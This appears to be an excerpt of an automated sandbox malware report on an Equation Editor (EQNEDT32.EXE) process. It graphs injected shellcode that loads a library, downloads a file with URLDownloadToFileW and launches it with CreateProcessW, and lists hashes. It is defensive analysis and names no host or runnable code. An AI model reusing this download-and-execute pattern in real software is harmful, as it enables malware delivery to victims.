Has exited:false

Target ID:2
Start time:08:43:59
Start date:03/12/2024
Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):true
Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:0x400000
File size:543'304 bytes
MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Reset < >

    Execution Graph

    Execution Coverage:3%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:39.2%
    Total number of Nodes:189
    Total number of Limit Nodes:2
    execution_graph 3423 3410000 3424 3410023 3423->3424 3426 34100bd 3424->3426 3427 3410071 3426->3427 3448 34102b0 ExitProcess 3427->3448 3429 341029e 3432 34102d6 3429->3432 3469 34102e5 3429->3469 3431 341031e 3432->3431 3433 341036d 3432->3433 3435 3410306 3432->3435 3437 34103e8 8 API calls 3433->3437 3438 3410392 URLDownloadToFileW 3433->3438 3489 3410352 3435->3489 3436 3410401 5 API calls 3443 34103f1 3436->3443 3437->3438 3438->3436 3439 3410448 CreateProcessW 3441 341045b ExitProcess 3439->3441 3442 341044f 3441->3442 3444 341046b 3442->3444 3446 341045e ExitProcess 3442->3446 3443->3439 3443->3444 3445 3410422 3 API calls 3443->3445 3444->3424 3447 3410413 3445->3447 3447->3439 3447->3444 3493 34102c9 3448->3493 3450 34102bc 3451 34102e5 18 API calls 3450->3451 3454 34102d6 3450->3454 3451->3454 3452 341031e 3453 341036d 3458 34103e8 8 API calls 3453->3458 3459 3410392 URLDownloadToFileW 3453->3459 3454->3452 3454->3453 3456 3410306 3454->3456 3461 3410352 15 API calls 3456->3461 3457 3410401 5 API calls 3463 34103f1 3457->3463 3458->3459 3459->3457 3460 3410448 CreateProcessW 3462 341045b ExitProcess 3460->3462 3461->3452 3464 341044f 3462->3464 3463->3460 3465 3410422 3 API calls 3463->3465 3468 341046b 3463->3468 3466 341045e ExitProcess 3464->3466 3464->3468 3467 3410413 3465->3467 3467->3460 3467->3468 3468->3429 3470 34102eb 3469->3470 3513 341030c 3470->3513 3490 3410354 3489->3490 3491 3410367 15 API calls 3490->3491 3492 3410359 3491->3492 3494 34102cf 3493->3494 3495 34102e5 18 API calls 3494->3495 3497 34102d6 3495->3497 3496 341031e 3497->3496 3498 341036d 3497->3498 3500 3410306 3497->3500 3502 34103e8 8 API calls 3498->3502 3503 3410392 URLDownloadToFileW 3498->3503 3505 3410352 15 API calls 3500->3505 3501 3410401 5 API calls 3507 34103f1 3501->3507 3502->3503 3503->3501 3504 3410448 CreateProcessW 3506 341045b ExitProcess 3504->3506 3505->3496 3508 341044f 3506->3508 3507->3504 3509 3410422 3 API calls 3507->3509 3512 341046b 3507->3512 3510 341045e ExitProcess 3508->3510 3508->3512 3511 3410413 3509->3511 3511->3504 3511->3512 3512->3450 3514 341030f 3513->3514 3515 3410352 15 API calls 3514->3515 3516 341031e 3515->3516 3358 3410352 3359 3410354 3358->3359 3362 3410367 LoadLibraryW 3359->3362 3361 3410359 3379 3410381 3362->3379 3364 341036e 3365 34103e3 3364->3365 3366 3410375 3364->3366 3367 34103e4 URLDownloadToFileW 3365->3367 3411 34103e8 URLDownloadToFileW 3366->3411 3393 3410401 3367->3393 3370 34103f1 3372 3410448 CreateProcessW 3370->3372 3378 341046b 3370->3378 3402 3410422 3370->3402 3371 3410392 3371->3367 3409 341045b 3372->3409 3374 341044f 3376 341045e ExitProcess 3374->3376 3374->3378 3378->3361 3380 3410384 3379->3380 3381 3410392 URLDownloadToFileW 3380->3381 3382 34103e8 8 API calls 3380->3382 3384 3410401 5 API calls 3381->3384 3382->3381 3387 34103f1 3384->3387 3385 3410448 CreateProcessW 3386 341045b ExitProcess 3385->3386 3389 341044f 3386->3389 3387->3385 3388 341046b 3387->3388 3390 3410422 3 API calls 3387->3390 3388->3364 3389->3388 3391 341045e ExitProcess 3389->3391 3392 3410413 3390->3392 3392->3385 3392->3388 3394 3410404 3393->3394 3395 3410422 3 API calls 3394->3395 3396 3410413 3395->3396 3397 3410448 CreateProcessW 3396->3397 3399 3410470 3396->3399 3398 341045b ExitProcess 3397->3398 3400 341044f 3398->3400 3399->3370 3400->3399 3401 341045e ExitProcess 3400->3401 3403 3410425 CreateProcessW 3402->3403 3405 341045b ExitProcess 3403->3405 3406 341044f 3405->3406 3407 341045e ExitProcess 3406->3407 3408 3410413 3406->3408 3408->3372 3408->3378 3410 341045e ExitProcess 3409->3410 3412 3410401 5 API calls 3411->3412 3415 34103f1 3411->3415 3412->3415 3413 3410448 CreateProcessW 3414 341045b ExitProcess 3413->3414 3417 341044f 3414->3417 3415->3413 3416 341046b 3415->3416 3418 3410422 3 API calls 3415->3418 3416->3371 3417->3416 3419 341045e ExitProcess 3417->3419 3420 3410413 3418->3420 3420->3413 3420->3416 3630 3410252 3631 3410256 3630->3631 3631->3631 3632 34102e5 18 API calls 3631->3632 3634 34102d6 3631->3634 3632->3634 3633 341031e 3634->3633 3635 341036d 3634->3635 3637 3410306 3634->3637 3639 34103e8 8 API calls 3635->3639 3640 3410392 URLDownloadToFileW 3635->3640 3642 3410352 15 API calls 3637->3642 3638 3410401 5 API calls 3644 34103f1 3638->3644 3639->3640 3640->3638 3641 3410448 CreateProcessW 3643 341045b ExitProcess 3641->3643 3642->3633 3646 341044f 3643->3646 3644->3641 3645 341046b 3644->3645 3647 3410422 3 API calls 3644->3647 3646->3645 3649 341045e ExitProcess 3646->3649 3648 3410413 3647->3648 3648->3641 3648->3645 3421 3410462 GetPEB 3422 341046d 3421->3422 3826 3410067 3827 341006c 3826->3827 3828 34100bd 28 API calls 3827->3828 3828->3827 4049 3410073 4051 341007d 4049->4051 4050 34102b0 25 API calls 4052 341029e 4050->4052 4051->4050 4053 34102e5 18 API calls 4052->4053 4055 34102d6 4052->4055 4053->4055 4054 341031e 4055->4054 4056 341036d 4055->4056 4058 3410306 4055->4058 4060 34103e8 8 API calls 4056->4060 4061 3410392 URLDownloadToFileW 4056->4061 4063 3410352 15 API calls 4058->4063 4059 3410401 5 API calls 4065 34103f1 4059->4065 4060->4061 4061->4059 4062 3410448 CreateProcessW 4064 341045b ExitProcess 4062->4064 4063->4054 4066 341044f 4064->4066 4065->4062 4067 341046b 4065->4067 4068 3410422 3 API calls 4065->4068 4066->4067 4070 341045e ExitProcess 4066->4070 4069 3410413 4068->4069 4069->4062 4069->4067 4115 34101bb 4118 3410071 4115->4118 4116 3410167 4117 34102b0 25 API calls 4119 341029e 4117->4119 4118->4115 4118->4116 4118->4117 4120 34102e5 18 API calls 4119->4120 4122 34102d6 4119->4122 4120->4122 4121 341031e 4122->4121 4123 341036d 4122->4123 4125 3410306 4122->4125 4127 34103e8 8 API calls 4123->4127 4128 3410392 URLDownloadToFileW 4123->4128 4130 3410352 15 API calls 4125->4130 4126 3410401 5 API calls 4132 34103f1 4126->4132 4127->4128 4128->4126 4129 3410448 CreateProcessW 4131 341045b ExitProcess 4129->4131 4130->4121 4133 341044f 4131->4133 4132->4129 4134 3410422 3 API calls 4132->4134 4137 341046b 4132->4137 4135 341045e ExitProcess 4133->4135 4133->4137 4136 3410413 4134->4136 4136->4129 4136->4137

    Callgraph

    • Executed
    • Not Executed
    • Opacity -> Relevance
    • Disassembly available
    callgraph 0 Function_034102C9 4 Function_03410352 0->4 7 Function_034104DB 0->7 8 Function_0341045B 0->8 11 Function_034102E5 0->11 14 Function_034103E8 0->14 23 Function_03410401 0->23 28 Function_0341048A 0->28 38 Function_03410422 0->38 1 Function_0341014C 2 Function_034100D0 2->4 2->8 2->11 2->14 2->23 2->28 2->38 47 Function_034102B0 2->47 3 Function_03410252 3->4 3->8 3->11 3->14 3->23 3->28 3->38 13 Function_03410367 4->13 5 Function_034100D4 5->4 5->8 5->11 5->14 5->23 5->28 5->38 5->47 6 Function_0341015B 9 Function_034100DE 9->4 9->8 9->11 9->14 9->23 9->28 9->38 9->47 10 Function_03410462 10->28 11->4 11->7 11->8 11->14 11->23 11->28 30 Function_0341030C 11->30 11->38 12 Function_03410067 49 Function_034100BD 12->49 13->8 13->14 22 Function_03410381 13->22 13->23 13->28 13->38 14->8 14->23 14->28 14->38 15 Function_034100EA 15->4 15->8 15->11 15->14 15->23 15->28 15->38 15->47 16 Function_034100EC 16->4 16->8 16->11 16->14 16->23 16->28 16->38 16->47 17 Function_034100F0 17->4 17->8 17->11 17->14 17->23 17->28 17->38 17->47 18 Function_03410073 18->4 18->8 18->11 18->14 18->23 18->28 18->38 18->47 19 Function_034100F2 19->4 19->8 19->11 19->14 19->23 19->28 19->38 19->47 20 Function_034100F9 20->4 20->8 20->11 20->14 20->23 20->28 20->38 20->47 21 Function_0341007A 21->4 21->8 21->11 21->14 21->23 21->28 21->38 21->47 22->8 22->14 22->23 22->28 22->38 23->8 23->28 23->38 24 Function_03410000 24->49 25 Function_03410082 25->4 25->8 25->11 25->14 25->23 25->28 25->38 25->47 26 Function_03410086 26->49 27 Function_03410088 27->4 27->8 27->11 27->14 27->23 27->28 27->38 27->47 29 Function_0341008D 29->4 29->8 29->11 29->14 29->23 29->28 29->38 29->47 30->4 31 Function_0341008F 31->4 31->8 31->11 31->14 31->23 31->28 31->38 31->47 32 Function_03410094 32->4 32->8 32->11 32->14 32->23 32->28 32->38 32->47 33 Function_03410118 33->4 33->8 33->11 33->14 33->23 33->28 33->38 33->47 34 Function_0341009B 34->4 34->8 34->11 34->14 34->23 34->28 34->38 34->47 35 Function_0341011A 35->4 35->8 35->11 35->14 35->23 35->28 35->38 35->47 36 Function_034100A0 36->4 36->8 36->11 36->14 36->23 36->28 36->38 36->47 37 Function_03410120 37->4 37->8 37->11 37->14 37->23 37->28 37->38 37->47 38->8 39 Function_034100A7 39->4 39->8 39->11 39->14 39->23 39->28 39->38 39->47 40 Function_034101A6 41 Function_034100A9 41->4 41->8 41->11 41->14 41->23 41->28 41->38 41->47 42 Function_03410129 42->4 42->8 42->11 42->14 42->23 42->28 42->38 42->47 43 Function_034100AD 43->4 43->8 43->11 43->14 43->23 43->28 43->38 43->47 44 Function_0341012D 44->4 44->8 44->11 44->14 44->23 44->28 44->38 44->47 45 Function_034100AF 45->4 45->8 45->11 45->14 45->23 45->28 45->38 45->47 46 Function_034100B1 46->4 46->8 46->11 46->14 46->23 46->28 46->38 46->47 47->0 47->4 47->8 47->11 47->14 47->23 47->28 47->38 48 Function_034101BB 48->4 48->8 48->11 48->14 48->23 48->28 48->38 48->47 49->4 49->8 49->11 49->14 49->23 49->28 49->38 49->47

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 0 3410367-3410373 LoadLibraryW call 3410381 3 34103e3 0->3 4 3410375-34103e2 call 34103e8 0->4 5 34103e4-34103f2 URLDownloadToFileW call 3410401 3->5 4->5 11 34103f5-34103f7 5->11 12 3410448-3410452 CreateProcessW call 341045b 5->12 17 34103f9 11->17 18 341046d 11->18 24 34104a4 12->24 25 3410454 12->25 21 341046b-341046c 17->21 22 34103fb-3410414 call 3410422 17->22 19 3410470-3410481 call 341048a 18->19 32 3410483-3410487 19->32 21->18 42 3410416-3410417 22->42 43 341047b-341047d 22->43 27 34104a6-34104aa 24->27 28 34104ac-34104b0 24->28 29 34104c5-34104c7 25->29 30 3410456-3410460 ExitProcess 25->30 27->28 33 34104b8-34104bf 27->33 28->29 34 34104b2-34104b6 28->34 36 34104d7-34104d8 29->36 38 34104c1 33->38 39 34104c3 33->39 34->29 34->33 38->29 39->29 44 34104c9-34104d2 39->44 45 3410419-341041a 42->45 46 341047e-3410481 42->46 43->46 47 3410496-3410499 44->47 50 341048b-3410493 45->50 51 341041c-341041f 45->51 46->19 46->32 48 34104d4 47->48 49 341049b-341049e 47->49 48->36 49->44 52 34104a0 49->52 50->47 53 3410421-3410447 51->53 54 3410478-341047a call 341048a 51->54 52->24 53->12 54->43
    APIs
    • LoadLibraryW.KERNEL32(03410359), ref: 03410367
      • Part of subcall function 03410381: URLDownloadToFileW.URLMON(00000000,03410392,?,00000000,00000000), ref: 034103EA
      • Part of subcall function 03410381: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 03410448
      • Part of subcall function 03410381: ExitProcess.KERNELBASE(00000000), ref: 03410460
    Memory Dump Source
    • Source File: 00000002.00000002.513687352.0000000003410000.00000004.00000020.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3410000_EQNEDT32.jbxd
    Similarity
    • API ID: Process$CreateDownloadExitFileLibraryLoad
    • String ID:
    • API String ID: 3376099886-0
    • Opcode ID: 6592375fc7b1a58468e8c9c54c0cbe0665dfd0497055732dad04c743ce56ee59
    • Instruction ID: 44253bf4d495c8b1cebedc6c8e52b901cf616727a0488dba287f346073870800
    • Opcode Fuzzy Hash: 6592375fc7b1a58468e8c9c54c0cbe0665dfd0497055732dad04c743ce56ee59
    • Instruction Fuzzy Hash: 66318DA184C7C11FD723E7704DA8699BF246F53100F5D8ACFD0C60E1A3E6689195D76B

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 56 34102e5-34102f3 call 34104db call 341030c 61 3410365 56->61 62 34102f5-34102fa 56->62 62->61 63 34102fc 62->63 64 341036d-3410373 63->64 65 34102fe-3410302 63->65 66 34103e3 64->66 67 3410375-3410377 64->67 68 3410304 65->68 69 3410357-3410362 65->69 70 34103e4-34103f2 URLDownloadToFileW call 3410401 66->70 72 3410378-34103e2 call 34103e8 67->72 68->72 73 3410306-3410346 call 3410352 68->73 69->61 79 34103f5-34103f7 70->79 80 3410448-3410452 CreateProcessW call 341045b 70->80 72->70 98 3410347 73->98 99 3410348-3410356 73->99 88 34103f9 79->88 89 341046d 79->89 96 34104a4 80->96 97 3410454 80->97 93 341046b-341046c 88->93 94 34103fb-3410414 call 3410422 88->94 90 3410470-3410481 call 341048a 89->90 107 3410483-3410487 90->107 93->89 118 3410416-3410417 94->118 119 341047b-341047d 94->119 101 34104a6-34104aa 96->101 102 34104ac-34104b0 96->102 103 34104c5-34104c7 97->103 104 3410456-3410460 ExitProcess 97->104 98->99 99->69 101->102 108 34104b8-34104bf 101->108 102->103 109 34104b2-34104b6 102->109 112 34104d7-34104d8 103->112 114 34104c1 108->114 115 34104c3 108->115 109->103 109->108 114->103 115->103 120 34104c9-34104d2 115->120 121 3410419-341041a 118->121 122 341047e-3410481 118->122 119->122 123 3410496-3410499 120->123 126 341048b-3410493 121->126 127 341041c-341041f 121->127 122->90 122->107 124 34104d4 123->124 125 341049b-341049e 123->125 124->112 125->120 128 34104a0 125->128 126->123 129 3410421-3410447 127->129 130 3410478-341047a call 341048a 127->130 128->96 129->80 130->119
    APIs
    • URLDownloadToFileW.URLMON(00000000,03410392,?,00000000,00000000), ref: 034103EA
    • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 03410448
    • ExitProcess.KERNELBASE(00000000), ref: 03410460
    Memory Dump Source
    • Source File: 00000002.00000002.513687352.0000000003410000.00000004.00000020.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3410000_EQNEDT32.jbxd
    Similarity
    • API ID: Process$CreateDownloadExitFile
    • String ID:
    • API String ID: 2126523932-0
    • Opcode ID: 1f10919ab1f6c90ae6d84674e412dc9910b49505c8241767f359782dae408607
    • Instruction ID: a82ed8d906d207469d0713e588a334364950b88a49d9feee77ac21500955024c
    • Opcode Fuzzy Hash: 1f10919ab1f6c90ae6d84674e412dc9910b49505c8241767f359782dae408607
    • Instruction Fuzzy Hash: 2F41CCB680DBC41FD713D7704EA9695BF247E53100B1C8ACFD0C64E1A3D6689195D36B

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 132 3410381-341038c 134 3410392-34103f2 URLDownloadToFileW call 3410401 132->134 135 341038d call 34103e8 132->135 140 34103f5-34103f7 134->140 141 3410448-3410452 CreateProcessW call 341045b 134->141 135->134 145 34103f9 140->145 146 341046d 140->146 152 34104a4 141->152 153 3410454 141->153 149 341046b-341046c 145->149 150 34103fb-3410414 call 3410422 145->150 147 3410470-3410481 call 341048a 146->147 160 3410483-3410487 147->160 149->146 170 3410416-3410417 150->170 171 341047b-341047d 150->171 155 34104a6-34104aa 152->155 156 34104ac-34104b0 152->156 157 34104c5-34104c7 153->157 158 3410456-3410460 ExitProcess 153->158 155->156 161 34104b8-34104bf 155->161 156->157 162 34104b2-34104b6 156->162 164 34104d7-34104d8 157->164 166 34104c1 161->166 167 34104c3 161->167 162->157 162->161 166->157 167->157 172 34104c9-34104d2 167->172 173 3410419-341041a 170->173 174 341047e-3410481 170->174 171->174 175 3410496-3410499 172->175 178 341048b-3410493 173->178 179 341041c-341041f 173->179 174->147 174->160 176 34104d4 175->176 177 341049b-341049e 175->177 176->164 177->172 180 34104a0 177->180 178->175 181 3410421-3410447 179->181 182 3410478-341047a call 341048a 179->182 180->152 181->141 182->171
    Memory Dump Source
    • Source File: 00000002.00000002.513687352.0000000003410000.00000004.00000020.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3410000_EQNEDT32.jbxd
    Similarity
    • API ID: Process$CreateDownloadExitFile
    • String ID:
    • API String ID: 2126523932-0
    • Opcode ID: 978b509ad16a72e11b22952abae1ea7e767ed6a5e166451ec275ee88cc3e99ca
    • Instruction ID: 12391534053be0a8946cc4f9afb34efae73c8a69eb3a611b3bf411b1527e996d
    • Opcode Fuzzy Hash: 978b509ad16a72e11b22952abae1ea7e767ed6a5e166451ec275ee88cc3e99ca
    • Instruction Fuzzy Hash: AE31AEA284C7C11FC723D3704DA8A95BF246F53100F5D8ACFC0C60E5A3E6688095D76B

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 184 34103e8-34103ea URLDownloadToFileW 185 34103f1-34103f2 184->185 186 34103ec call 3410401 184->186 187 34103f5-34103f7 185->187 188 3410448-3410452 CreateProcessW call 341045b 185->188 186->185 192 34103f9 187->192 193 341046d 187->193 199 34104a4 188->199 200 3410454 188->200 196 341046b-341046c 192->196 197 34103fb-3410414 call 3410422 192->197 194 3410470-3410481 call 341048a 193->194 207 3410483-3410487 194->207 196->193 217 3410416-3410417 197->217 218 341047b-341047d 197->218 202 34104a6-34104aa 199->202 203 34104ac-34104b0 199->203 204 34104c5-34104c7 200->204 205 3410456-3410460 ExitProcess 200->205 202->203 208 34104b8-34104bf 202->208 203->204 209 34104b2-34104b6 203->209 211 34104d7-34104d8 204->211 213 34104c1 208->213 214 34104c3 208->214 209->204 209->208 213->204 214->204 219 34104c9-34104d2 214->219 220 3410419-341041a 217->220 221 341047e-3410481 217->221 218->221 222 3410496-3410499 219->222 225 341048b-3410493 220->225 226 341041c-341041f 220->226 221->194 221->207 223 34104d4 222->223 224 341049b-341049e 222->224 223->211 224->219 227 34104a0 224->227 225->222 228 3410421-3410447 226->228 229 3410478-341047a call 341048a 226->229 227->199 228->188 229->218
    APIs
    • URLDownloadToFileW.URLMON(00000000,03410392,?,00000000,00000000), ref: 034103EA
      • Part of subcall function 03410401: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 03410448
      • Part of subcall function 03410401: ExitProcess.KERNELBASE(00000000), ref: 03410460
    Memory Dump Source
    • Source File: 00000002.00000002.513687352.0000000003410000.00000004.00000020.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3410000_EQNEDT32.jbxd
    Similarity
    • API ID: Process$CreateDownloadExitFile
    • String ID:
    • API String ID: 2126523932-0
    • Opcode ID: 9180f0b284761833f9f31796fac9cfcee9c35c59c9fab4882ec9e8daa7a07ec6
    • Instruction ID: 296060aa46d858be5bdac15c6ef2e45e40df1937aaf1306b79aed064ed448285
    • Opcode Fuzzy Hash: 9180f0b284761833f9f31796fac9cfcee9c35c59c9fab4882ec9e8daa7a07ec6
    • Instruction Fuzzy Hash: C811E975808B006ADB60F7A4CEC4BABF759BFC0700F188A4FE1954D256D970C5E4B66D

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 231 3410401-3410414 call 3410422 236 3410416-3410417 231->236 237 341047b-341047d 231->237 238 3410419-341041a 236->238 239 341047e-3410481 236->239 237->239 240 341048b-3410493 238->240 241 341041c-341041f 238->241 242 3410470-3410481 call 341048a 239->242 243 3410483-3410487 239->243 247 3410496-3410499 240->247 245 3410421-3410452 CreateProcessW call 341045b 241->245 246 3410478-341047a call 341048a 241->246 242->243 258 34104a4 245->258 262 3410454 245->262 246->237 248 34104d4 247->248 249 341049b-341049e 247->249 256 34104d7-34104d8 248->256 254 34104a0 249->254 255 34104c9-34104d2 249->255 254->258 255->247 260 34104a6-34104aa 258->260 261 34104ac-34104b0 258->261 260->261 263 34104b8-34104bf 260->263 264 34104b2-34104b6 261->264 265 34104c5-34104c7 261->265 262->265 266 3410456-3410460 ExitProcess 262->266 267 34104c1 263->267 268 34104c3 263->268 264->263 264->265 265->256 267->265 268->255 268->265
    Memory Dump Source
    • Source File: 00000002.00000002.513687352.0000000003410000.00000004.00000020.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3410000_EQNEDT32.jbxd
    Similarity
    • API ID: Process$CreateExit
    • String ID:
    • API String ID: 126409537-0
    • Opcode ID: fdbaa3d9f1220df4e5171d05b8988b32f4ca09a6248049512152c847acd2eb6c
    • Instruction ID: 5aac84d31bf73f0b0a0b115274d707dba334fa69d358b131884e76ff3347ad46
    • Opcode Fuzzy Hash: fdbaa3d9f1220df4e5171d05b8988b32f4ca09a6248049512152c847acd2eb6c
    • Instruction Fuzzy Hash: 88113679909B4269CB20EB7489C09ABF765EB81300F4CCA4BE4854D246D534C0E2F76D

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 271 3410422-3410452 CreateProcessW call 341045b 277 34104a4 271->277 278 3410454 271->278 279 34104a6-34104aa 277->279 280 34104ac-34104b0 277->280 281 34104c5-34104c7 278->281 282 3410456-3410460 ExitProcess 278->282 279->280 283 34104b8-34104bf 279->283 280->281 284 34104b2-34104b6 280->284 286 34104d7-34104d8 281->286 287 34104c1 283->287 288 34104c3 283->288 284->281 284->283 287->281 288->281 290 34104c9-34104d2 288->290 292 34104d4 290->292 293 341049b-341049e 290->293 292->286 293->290 294 34104a0 293->294 294->277
    APIs
    • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 03410448
      • Part of subcall function 0341045B: ExitProcess.KERNELBASE(00000000), ref: 03410460
    Memory Dump Source
    • Source File: 00000002.00000002.513687352.0000000003410000.00000004.00000020.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3410000_EQNEDT32.jbxd
    Similarity
    • API ID: Process$CreateExit
    • String ID:
    • API String ID: 126409537-0
    • Opcode ID: 4581ba8be27b4f40f7c6f75f124480c8923545fa759ab39b88aabc2470b18446
    • Instruction ID: 0a1790f3fe544336bdbc5527a26d0f5a12a09a82b459a77516c15a043bf84afb
    • Opcode Fuzzy Hash: 4581ba8be27b4f40f7c6f75f124480c8923545fa759ab39b88aabc2470b18446
    • Instruction Fuzzy Hash: 8F014779405B4261C730E66889C4BFBB764ABC0310F8C8A0BD8890C246D428C1E3B7AD

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 295 341045b-3410460 ExitProcess
    APIs
    • ExitProcess.KERNELBASE(00000000), ref: 03410460
    Memory Dump Source
    • Source File: 00000002.00000002.513687352.0000000003410000.00000004.00000020.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3410000_EQNEDT32.jbxd
    Similarity
    • API ID: ExitProcess
    • String ID:
    • API String ID: 621844428-0
    • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
    • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
    • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
    • Instruction Fuzzy Hash:

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 297 3410462-341046a GetPEB 298 341046d 297->298 299 3410470-3410481 call 341048a 298->299 302 3410483-3410487 299->302
    Memory Dump Source
    • Source File: 00000002.00000002.513687352.0000000003410000.00000004.00000020.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3410000_EQNEDT32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
    • Instruction ID: 6a1fcf1364fb3ff1a7c135065275b0addfbfae8034b04788d3731a1f061bbee9
    • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
    • Instruction Fuzzy Hash: BBD01C752029028FD204DB04C980A13F36AFBD8250B28C66AE0004B629C330E8A2DA98

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 303 34102b0-34102cf ExitProcess call 34102c9 306 34102d6-34102d7 303->306 307 34102d1 call 34102e5 303->307 308 341032a-3410346 306->308 309 34102da 306->309 307->306 313 3410347 308->313 314 3410348-3410349 308->314 311 341034b-3410356 309->311 312 34102dc-34102df 309->312 317 3410357-3410362 311->317 312->313 316 34102e2 312->316 313->314 314->311 316->317 318 34102e4-34102f3 316->318 320 3410365 317->320 318->320 321 34102f5-34102fa 318->321 321->320 322 34102fc 321->322 323 341036d-3410373 322->323 324 34102fe-3410302 322->324 325 34103e3 323->325 326 3410375-3410377 323->326 324->317 327 3410304 324->327 328 34103e4-34103f2 URLDownloadToFileW call 3410401 325->328 329 3410378-34103e2 call 34103e8 326->329 327->329 330 3410306-3410327 call 3410352 327->330 336 34103f5-34103f7 328->336 337 3410448-3410452 CreateProcessW call 341045b 328->337 329->328 330->308 344 34103f9 336->344 345 341046d 336->345 351 34104a4 337->351 352 3410454 337->352 348 341046b-341046c 344->348 349 34103fb-3410414 call 3410422 344->349 346 3410470-3410481 call 341048a 345->346 359 3410483-3410487 346->359 348->345 369 3410416-3410417 349->369 370 341047b-341047d 349->370 354 34104a6-34104aa 351->354 355 34104ac-34104b0 351->355 356 34104c5-34104c7 352->356 357 3410456-3410460 ExitProcess 352->357 354->355 360 34104b8-34104bf 354->360 355->356 361 34104b2-34104b6 355->361 363 34104d7-34104d8 356->363 365 34104c1 360->365 366 34104c3 360->366 361->356 361->360 365->356 366->356 371 34104c9-34104d2 366->371 372 3410419-341041a 369->372 373 341047e-3410481 369->373 370->373 374 3410496-3410499 371->374 377 341048b-3410493 372->377 378 341041c-341041f 372->378 373->346 373->359 375 34104d4 374->375 376 341049b-341049e 374->376 375->363 376->371 379 34104a0 376->379 377->374 380 3410421-3410447 378->380 381 3410478-341047a call 341048a 378->381 379->351 380->337 381->370
    APIs
    • ExitProcess.KERNELBASE(0341029E), ref: 034102B0
    Memory Dump Source
    • Source File: 00000002.00000002.513687352.0000000003410000.00000004.00000020.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3410000_EQNEDT32.jbxd
    Similarity
    • API ID: ExitProcess
    • String ID:
    • API String ID: 621844428-0
    • Opcode ID: 473c6fdef2c4b7fa16df27cfec08b81aa7738ac39827434a6fcd7ce4b0c7fb34
    • Instruction ID: 836f2921e2fc804ad354eccfd37222d7a2cbf53861ff5a8f2583c3e355d55122
    • Opcode Fuzzy Hash: 473c6fdef2c4b7fa16df27cfec08b81aa7738ac39827434a6fcd7ce4b0c7fb34
    • Instruction Fuzzy Hash: 8911CDBA80EFC85FC312D7705EAA045FF60791350071C86DFC0844E2A3E254E6AA939B